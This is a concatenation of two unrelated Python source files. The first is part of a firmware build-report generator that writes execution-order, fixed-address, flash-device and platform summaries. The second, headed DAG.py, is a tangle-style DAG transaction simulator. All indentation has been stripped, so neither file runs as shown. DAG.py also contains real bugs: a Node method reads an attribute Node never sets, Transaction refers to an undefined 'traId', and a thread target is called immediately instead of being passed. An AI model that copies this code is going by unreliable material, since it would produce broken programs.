for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
if int(str(Module.AutoGenVersion), 0) >= 0x00010005:
RealEntryPoint = "_ModuleEntryPoint"
else:
RealEntryPoint = EntryPoint
if EntryPoint == "_ModuleEntryPoint":
CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "")
Match = gGlueLibEntryPoint.search(CCFlags)
if Match:
EntryPoint = Match.group(1)
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = open(SourceList, "w+")
for Item in self._SourceList:
FileWrite(TempFile, Item)
TempFile.close()
TempFile = open(GuidList, "w+")
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
TempFile.close()
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb["1B45CC0A-156A-428A-AF62-49864DA0E6E6"] = "PEI Apriori"
self._GuidsDb["FC510EE7-FFDC-11D4-BD41-0080C73C8881"] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VpdFilePath = os.path.join(self.FvPath, "%s.map" % Wa.Platform.VpdToolGuid)
self.VPDBaseAddress = 0
self.VPDSize = 0
self.VPDInfoList = []
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
if os.path.isfile(self.VpdFilePath):
fd = open(self.VpdFilePath, "r")
Lines = fd.readlines()
for Line in Lines:
Line = Line.strip()
if len(Line) == 0 or Line.startswith("#"):
continue
try:
PcdName, SkuId, Offset, Size, Value = Line.split("#")[0].split("|")
PcdName, SkuId, Offset, Size, Value = PcdName.strip(), SkuId.strip(), Offset.strip(), Size.strip(), Value.strip()
if Offset.lower().startswith('0x'):
Offset = '0x%08X' % (int(Offset, 16) + self.VPDBaseAddress)
else:
Offset = '0x%08X' % (int(Offset, 10) + self.VPDBaseAddress)
self.VPDInfoList.append("%s | %s | %s | %s | %s" % (PcdName, SkuId, Offset, Size, Value))
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Fail to parse VPD information file %s" % self.VpdFilePath)
fd.close()
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if len(self.VPDInfoList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in self.VPDInfoList:
ValueList = item.split('|')
Value = ValueList[-1].strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
ValueList[-1] = ' {'
FileWrite(File, '|'.join(ValueList))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, item)
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = StringIO('')
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, True)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
DAG.py | import numpy as np
import networkx as nx
import matplotlib.pyplot as plt
import threading
import random
import time as timeee
# This is the base of CIDDS simulator
#
# Here we have a Directed Acyclic Graph (DAG), which is
#
# Implementation of algorithms for MCMC and URTS are inspired from inputs by
# Alon Gal from IOTA foundation and Minh-nghia, Nguyen.
# For more details on their individual works visit:
# https://github.com/iotaledger/iotavisualization
# https://github.com/minh-nghia/TangleSimulator
class Node(object):
'''
Stores the individual transaction detail for a tangle
'''
def __init__(self, id: str, time: float):
'''
constructor
:param id: id of the node
:param time: timestamp in unit time
'''
self.x = 300
self.y = 200
self.id = id
self.time = time
def is_tip_delayed(self):
return self.dag.time - 5.0 < self.approved_time
class DAG(object):
def __init__(self, rate=50, alpha=0.001, algorithm='mcmc', plot=False):
self.time = 1.0
self.rate = rate
self.alpha = alpha
if plot:
self.graph = nx.OrderedDiGraph()
self.algorithm = algorithm
self.cw_cache = dict()
self.transaction_cache = set()
self.tip_walk_cache = list()
self.genesis = Genesis(self)
self.transactions = [self.genesis]
self.tra_id_counter = 1
self.nodes = [Node(id=0, time=0)]
def generate_next_node(self):
time_difference = np.random.exponential(1.0 / self.rate)
self.time += time_difference
self.tra_id_counter += 1
if self.algorithm == 'mcmc':
approved_tips = set(self.mcmc())
elif self.algorithm == 'urts':
approved_tips = set(self.urts())
else:
raise Exception()
transaction = Transaction(self, self.time, approved_tips,
self.tra_id_counter - 1)
newNode = Node(id=str(transaction.num), time=transaction.time)
self.nodes.append(newNode)
self.transactions.append(transaction)
for t in approved_tips:
t.approved_time = np.minimum(self.time, t.approved_time)
t._approved_directly_by.add(transaction)
if hasattr(self, 'graph'):
self.graph.add_edges_from([(transaction.num, t.num)])
self.cw_cache = {}
def tips(self):
return [t for t in self.transactions if t.is_visible() and t.is_tip_delayed()]
def urts(self):
tips = self.tips()
if len(tips) == 0:
return np.random.choice(
[t for t in self.transactions if t.is_visible()]),
if len(tips) == 1:
return tips[0],
return np.random.choice(tips, 2)
def mcmc(self):
num_particles = 10
lower_bound = int(np.maximum(0, self.tra_id_counter - 20.0 * self.rate))
upper_bound = int(np.maximum(1, self.tra_id_counter - 10.0 * self.rate))
candidates = self.transactions[lower_bound:upper_bound]
particles = np.random.choice(candidates, num_particles)
distances = {}
for p in particles:
t = threading.Thread(target=self.mcmc_walk(p))
t.start()
tips = self.tip_walk_cache[:2]
self.tip_walk_cache = list()
return tips
def mcmc_walk(self, starting_transaction):
p = starting_transaction
while not p.is_tip_delayed() and p.is_visible():
if len(self.tip_walk_cache) >= 2:
return
next_transactions = p.approved_directly_by()
if self.alpha > 0:
p_cw = p.calculate_delayed_cumulative_weight()
c_weights = np.array([])
for transaction in next_transactions:
c_weights = np.append(c_weights,
transaction.calculate_delayed_cumulative_weight())
deno = np.sum(np.exp(-self.alpha * (p_cw - c_weights)))
probs = np.divide(np.exp(-self.alpha * (p_cw - c_weights)),
deno)
else:
probs = None
p = np.random.choice(next_transactions, p=probs)
self.tip_walk_cache.append(p)
def plot(self):
global transactionCounter
transactionCounter = 0
if hasattr(self, 'graph'):
pos = nx.get_node_attributes(self.graph, 'pos')
nx.draw_networkx_nodes(self.graph, pos, node_color='g', node_size=600, alpha=0.65)
nx.draw_networkx_labels(self.graph, pos, font_color="r", font_weight="bold", font_size=20)
nx.draw_networkx_edges(self.graph, pos, edgelist=self.graph.edges(), arrows=True)
plt.xlabel('Time')
plt.yticks([])
return plt
class Transaction(object):
def __init__(self, dag, time, approved_transactions, num, malicious=False):
self.dag = dag
self.time = time
self.approved_transactions = approved_transactions
self._approved_directly_by = set()
self.approved_time = float('inf')
self.num = num
self._approved_by = set()
if hasattr(self.dag, 'graph'):
self.dag.graph.add_node(self.traId, pos=(self.time, np.random.uniform(-1, 1)))
def is_visible(self):
return self.dag.time >= self.time + 1.0
def is_tip(self):
return self.dag.time < self.approved_time
def is_tip_delayed(self):
return self.dag.time - 1.0 < self.approved_time
def cumulative_weight(self):
cw = 1 + len(self.approved_by())
self.dag.transaction_cache = set()
return cw
def calculate_delayed_cumulative_weight(self):
cached = self.dag.cw_cache.get(self.num)
if cached:
return cached
else:
cached = 1 + len(self.approved_by_delayed())
self.dag.transaction_cache = set()
self.dag.cw_cache[self.num] = cached
return cached
def approved_by(self):
for t in self._approved_directly_by:
if t not in self.dag.transaction_cache:
self.dag.transaction_cache.add(t)
self.dag.transaction_cache.update(t.approved_by())
